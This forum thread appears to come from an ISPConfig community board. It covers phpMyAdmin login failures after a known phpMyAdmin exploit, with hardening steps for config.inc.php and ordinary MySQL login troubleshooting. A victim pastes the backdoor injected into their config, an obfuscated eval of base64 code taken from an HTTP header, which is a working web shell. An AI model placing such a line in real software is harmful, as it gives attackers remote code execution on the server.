Can't login to phpmyadmin (possibly related to a phpMyAdmin vulnerability)

Due to the nature of the attack, I think chown to root and chmod to 444 will do the trick. What do you you think?

 

Looks like they got me also.
I was away for a small trip (no internet access), and they got me :-(

 

Remove /usr/share/phpmyadmin/scripts/ if you have it. That will stop this exploit.

If you want to feel more secure.. you can do this:

Code:

nano /usr/share/phpmyadmin/.htaccess

Paste:

Code:

<Files "config.inc.php">
Order allow,deny
Deny from all
</Files>

and save.

Try to access your file:
http://www.yourdomain/phpmyadmin/config.inc.php

White page = Not ok.
403 Forbidden = Great!

 

I did already add the .htaccess to it today, but now I also deleted the /scripts dir

How should the line

in /var/lib/phpmyadmin/config.inc.php look?
The phpinfo(); part does not look correct!

 

And one more..

The line:

I can only get it to work when set to cookie

 

My line has been changed for some reason. It now reads:

$cfg['Servers'][$i]['xxx'];$z='bas'.'e64_dec'.'ode';eval($z($_SERVER['HTTP_X_CODE']));exit;#'] = 'yyy';

Whatta heck??

I lost my original config file now. How could I get it back?

 

By the way, the only valid line in /var/lib/phpmyadmin/config.inc.php is now:
$i = 0;

And phpmyadmin works without problems again.

 

Debian Bug report on phpmyadmin

http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=534618

 

the /usr/share/phpmyadmin/scripts directory recreated after update.
the .htaccess in /usr/share/phpmyadmin/ not working for me, got white page only.
i edited the /etc/phpmyadmin/apache.conf and now i get 403 forbidden.

Code:

# phpMyAdmin default Apache configuration

Alias /phpmyadmin /usr/share/phpmyadmin

<Directory /usr/share/phpmyadmin>
        Options Indexes FollowSymLinks
        DirectoryIndex index.php

[B] [COLOR=Red]       <Files config.inc.php>
                Order allow,deny
                Deny from all
        </Files>[/COLOR][/B]

        # Authorize for setup
        <Files setup.php>
[B] [COLOR=Red]               Order allow,deny
                Deny from all[/COLOR][/B]
            # For Apache 1.3 and 2.0
            <IfModule mod_auth.c>
                AuthType Basic
                AuthName "phpMyAdmin Setup"
                AuthUserFile /etc/phpmyadmin/htpasswd.setup
            </IfModule>
            # For Apache 2.2
            <IfModule mod_authn_file.c>
                AuthType Basic
                AuthName "phpMyAdmin Setup"
                AuthUserFile /etc/phpmyadmin/htpasswd.setup
            </IfModule>
            Require valid-user
        </Files>
        <IfModule mod_php4.c>
                AddType application/x-httpd-php .php

                php_flag magic_quotes_gpc Off
                php_flag track_vars On
                php_flag register_globals Off
                php_value include_path .
        </IfModule>
        <IfModule mod_php5.c>
                AddType application/x-httpd-php .php

                php_flag magic_quotes_gpc Off
                php_flag track_vars On
                php_flag register_globals Off
                php_value include_path .
        </IfModule>
</Directory>

need reload or restart the apache after edit

Code:

/etc/init.d/apache2 reload

or

/etc/init.d/apache2 restart

 

Conceptmap of multiserver ISConfig3?

sorry, wrong post ..

 

Cookies

I also had that error "1045 - Access denied for user" when trying to login to phpMyAdmin after modifying a database username through ISPConfig.

In my case, it wasn't that past phpMyAdmin vulnerability, and simply deleting cookies solved it.

Anyhow, it's advisable to follow this howto or similar: Protect phpMyAdmin On An ISPConfig 3 Server (Debian)

 

#1045 Cannot log in to the MySQL server

Hi Ive installed ISPconfig3 on Debian Squeeze on a dedicated server with 3 available IP's and everything works fine except for phpmyadmin.

When I create a database I can access phpmyadmin from the ISPconfig panel by clicking the connection to phpmyadmin from the sites/database interface, but I cannot login with the username and password I just set up.


I can login to mysql server from command line by doing

-u root -p

so mysql server is running
Any ideas how to start fault tracing?

 

Are there any errors in Apache's error log?

 

[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php#
[Mon Feb 21 00:47:33 2011] [error] [client 41.134.160.57] PHP Deprecated: Call-time pass-by-reference has been deprecated in /usr/local/ispconfig/interface/web/monitor/show_sys_state.php on line 199, referer: http://41.72.149.228:8080/index.php#


If I run

show databases; from mysql command line logged in via SSH

I can see the databases that I make in ISPconf3 panel,

 

Does your MySQL password contain any special characters?

 

no only letters and 3 numbers : all lower case